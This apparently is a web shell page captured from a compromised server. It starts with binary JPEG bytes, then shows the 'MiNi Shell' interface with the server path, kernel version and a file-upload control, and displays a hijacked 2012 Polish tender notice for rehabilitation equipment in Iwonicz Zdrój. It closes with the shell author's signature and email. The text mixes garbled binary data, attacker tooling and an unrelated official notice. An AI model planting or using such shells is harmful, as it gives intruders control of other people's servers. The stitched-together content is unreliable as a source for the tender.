JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120919/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120919/354806-N-2012.html

<p class="kh_header"><b>Iwonicz Zdrój: DOSTAWA, MONTAŻ, PRZESZKOLENIE PRACOWNIKÓW  ORAZ  URUCHOMIENIE FABRYCZNIE NOWEGO SPRZĘTU REHABILITACYJNEGO TYPU:
1.Aparat do terapii ultradźwiękowej				szt. 1
2.Wioślarz						szt. 1
3.Stepper z uchwytem na kończyny górne			szt. 1
4.Przenośne krzesło do masażu				szt. 1
5.Fotel to masażu automatycznego				szt. 1
6.Bieżnia							szt. 1
7.Kuchnia parafinowa przeznaczona do podgrzewania okładów termicznych i borowinowych						szt. 1
8.Wanna medyczna do kąpieli solankowych i siarkowodorowych	szt. 2
9.Urządzenie do suchych kąpieli kwasowęglowych		szt.1
lub równoważnego opisanego w zał nr 7</b><br>
<b>Numer ogłoszenia: 354806 - 2012; data zamieszczenia: 19.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Rehabilitacji Rolników Kasy Rolniczego Ubezpieczenia Społecznego , ul. Ks. Jana Rąba 22, 38-440 Iwonicz Zdrój, woj. podkarpackie, tel. 013 4350612, faks 013 4350612.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> crriwonicz.sanatoria.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA, MONTAŻ, PRZESZKOLENIE PRACOWNIKÓW  ORAZ  URUCHOMIENIE FABRYCZNIE NOWEGO SPRZĘTU REHABILITACYJNEGO TYPU:
1.Aparat do terapii ultradźwiękowej				szt. 1
2.Wioślarz						szt. 1
3.Stepper z uchwytem na kończyny górne			szt. 1
4.Przenośne krzesło do masażu				szt. 1
5.Fotel to masażu automatycznego				szt. 1
6.Bieżnia							szt. 1
7.Kuchnia parafinowa przeznaczona do podgrzewania okładów termicznych i borowinowych						szt. 1
8.Wanna medyczna do kąpieli solankowych i siarkowodorowych	szt. 2
9.Urządzenie do suchych kąpieli kwasowęglowych		szt.1
lub równoważnego opisanego w zał nr 7.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa, montaż oraz uruchomienia sprzętu opisanego poniżej (szczegółowo w załączniku nr 7 do SIWZ) oraz przeszkolenie pracowników Zamawiającego. 
Nazwa,opis i ilość sprzętu :
1.Aparat do terapii ultradźwiękowej- szt 1
- 2 głowice
1)częstotliwość pracy 1MHz/3,5 MHz efektywna powierzchnia promieniowania 
1 cm2, max. moc 2,5 W
2)częstotliwość pracy 1MHz/3,5 MHz, efektywna powierzchnia promieniowania 
4 cm2, max. moc 10W,
- tryb pracy programowy/manualny,
- duży, czytelny wyświetlacz,
- autotest - bieżąca kontrola sprawności aparatu i głowic,
- zegar zabiegowy 1-30 min.,
- zasilanie 230 V, 50 Hz, 
- obsługa w trybie graficznym, 
- emisja ultradźwięków ciągła i pulsacyjna,
- kontrola przylegania czoła głowicy sprzężona z zegarem  zabiegowym,
- co najmniej 10 programów do ustawienia przez użytkownika,
- co najmniej 52 programy zabiegowe z edycją ich nazw,
- certyfikat zgodności CE.	
2.Wioślarz  - szt. 1
-opór: elektromagnetyczny system hamowania,
- napęd: cięgno linowe,
- regulacje obciążenia: do 500 W,
- maksymalna masa ćwiczącego: 130 kg,
- waga koła zamachowego nie mniej niż 6 kg,
- siedzisko ułożyskowane na rolkach,
- pas do pomiaru tętna,
- komputer z funkcją pomiaru czasu, odległości i tempa  wiosłowania oraz zużycia energii,
- możliwość składania,
- certyfikat zgodności CE.	
3.Stepper z uchwytem na kończyny górne   - szt .1
- opór: 2 tłoki hydrauliczne,
- regulacja obciążenia w skali 1-12,
- maksymalna masa ćwiczącego 110 kg,
- komputer treningowy umożliwiający pomiar: czasu, ilości   stopni pokonywanych w jednostce czasu, całkowitej   pokonywanej wysokości,  temperatury pomieszczenia, zużycia energii, tętna,
- certyfikat zgodności CE.	
4.Przenośne krzesło do masażu  - szt. 1
- wymiary :głębokość 64 cm -78 cm, szerokość ok. 50 cm,   wysokość regulowana w zakresie 110cm-127 cm,
- dopuszczalne obciążenie 150 kg
- kolor jasnozielony
5.Fotel do masażu automatycznego - szt. 1
- co najmniej 8 programów profilaktycznych,
- co najmniej 3 niezależne cykle masażu kończyn dolnych
- 10 technik masażu w menu selekcji ręcznej,
- niezależny system masażu wibracyjnego w obrębie mięśni kręgosłupa i pośladków,
- sensoryczny system detekcji punktów ucisku strefy kręgosłupa,
- czasowy wyłącznik: ok. 15 min,
- elektryczna regulacja fotela,
- regulacja długości podnóżka,
-  kompaktowy pilot,
- wymiary w pozycji siedzącej: (szer. x wys. x gł.)około 74 x 114 x 119cm,
- wymiary w pozycji rozłożonej: (szer. x wys. x gł.) około 74x 74 x173 cm,
- kąt rozkładania ok. 120-170 stopni,
- zasilanie 230 V/50 Hz
- pobór mocy nie więcej niż 210W,
 certyfikat zgodności CE	
6.Bieżnia  - szt. 1
- silnik elektryczny/zasilanie sieciowe  230V/50Hz
- prędkość 0.8 - 20 km/h,
- elektryczne ustawienie stopnia wzniesienia od 0% do 12 %,
- maksymalne obciążenie wagowe 150 kg,
- wymiary taśmy  dł. przynajmniej 1,5 m, szer.nie mniej niż 0,51 m
- certyfikat zgodności CE.	
7.Kuchnia parafinowa przeznaczona do podgrzewania okładów termicznych i borowinowych  - szt. 1
 - materiał - nierdzewna blacha chromoniklowa,
- ustawiona na kółkach jezdnych,
- pojemność zbiornika przynajmniej 56 l,
- wymiary nie większe niż (dł. x szer. x wys.) 705 x 450 x 760 mm,
- regulacja temp. płynna w zakresie temp. pokojowej do 80 °C,
- pomiar temperatury co 1 °C,
- zasilanie 220 V/50 Hz,
- pobór mocy 1500 W,
- certyfikat zgodności CE
8.Wanna medyczna do kąpieli solankowych i siarkowodorowych szt. 2 
- pojemność całkowita nie mniejsza niż 250 l,
- wymiary (dł. x szer. x. wys.)  nie więcej niż 1980 x 840 x 870mm,
- dodatkowe stopnie ułatwiające wejście do wanny,
- system napełniania,
- prysznic ręczny,
- certyfikat zgodności CE.	
9.Urządzenie do suchych kąpieli kwasowęglowych - szt. 1
- konstrukcja jezdna urządzenia,
- elektryczne ustawienie wysokości leżyska w zakresie od 450 mm 
do 950 mm +/- 50 mm,
- regulowana wysokość podgłówka,
- automatyczne  nawilżenie gazu zwiększające  efektywność zabiegu od momentu jego rozpoczęcia,
- niezmienne i wysokie stężenie CO2  oddziałujące na pacjenta podczas zabiegu dzięki cyrkulacji CO2
- regulacja temperatury gazu w przedziale od 32°C  do 37° C,
-stała wysoka koncentracja CO2 uzyskana dzięki automatycznemu uzupełnianiu gazu,
- w pełni zautomatyzowany przebieg zabiegu,
- sygnalizacja dźwiękowa zakończenia terapii,
- skuteczne i szybkie uszczelnianie komory zabiegowej,
- kontrolowane odprowadzenie CO2 po zabiegu,
- pobór mocy max. 0,9 kW,
- zużycie CO2 na piętnastominutowy zabieg max. 0,0005 m3,
- zasilanie 230V/50Hz ,
- wymiary nie większe niz (dł. x szer. x wys.) 2000 x 700 x 1250mm.
- certyfikat zgodności CE..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.15.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Ocena spełniania warunków zostanie dokonana wg formuły spełnia/nie spełnia, na podstawie załączonego oświadczenia z art. 22 ust. 1 ustawy PZP (załącznik nr 2).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Ocena spełniania warunków zostanie dokonana wg formuły spełnia/nie spełnia, na podstawie załączonego oświadczenia z art. 22 ust. 1 ustawy PZP (załącznik nr 2).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Ocena spełniania warunków zostanie dokonana wg formuły spełnia/nie spełnia, na podstawie załączonego oświadczenia z art. 22 ust. 1 ustawy PZP (załącznik nr 2).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Ocena spełniania warunków zostanie dokonana wg formuły spełnia/nie spełnia, na podstawie załączonego oświadczenia z art. 22 ust. 1 ustawy PZP (załącznik nr 2).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Ocena spełniania warunków zostanie dokonana wg formuły spełnia/nie spełnia, na podstawie załączonego oświadczenia z art. 22 ust. 1 ustawy PZP (załącznik nr 2).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a)oświadczenie Wykonawcy (załącznik nr 4 do SIWZ ), że oferowany przedmiot   
  zamówienia, który jest wyrobem medycznym w rozumieniu ustawy z dnia 20.05.2010r.o wyrobach medycznych (Dz. U. z 2010 r., Nr 107, poz. 679) jest dopuszczony do obrotu i używania na terenie Polski, zgodnie z obowiązującym prawem,
b)instrukcje obsługi, katalogi, foldery, karty charakterystyki, ulotki, - przedstawiające oferowany sprzęt, wskazujące parametry i wymagania określone przez Zamawiającego.
c)deklaracje zgodności z odpowiednimi dyrektywami UE, certyfikaty CE lub zgłoszenie do Rejestru wyrobów medycznych - o ile jest to wymagane przepisami prawa</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta musi zawierać :
   a) wypełniony formularz ofertowy (załącznik nr 1 do SIWZ),
   b) wypełniona oferta cenowa (załącznik nr 5 do SIWZ),
   c) pełnomocnictwo  -   w   przypadku   wykonawców   działających   przez   pełnomocnika,  o którym mowa w pkt 5 lit c), w przypadku wykonawców prowadzących działalność w formie spółki cywilnej - umowę spółki cywilnej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> crriwonicz.sanatoria.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Rehabilitacji Rolników KRUS, 38-440 Iwonicz-Zdrój, ul. ks. Jana Rąba 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.10.2012 godzina 09:00, miejsce: Centrum Rehabilitacji Rolników KRUS, 38-440 Iwonicz-Zdrój, ul. ks. Jana Rąba 22
pok. nr 112.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com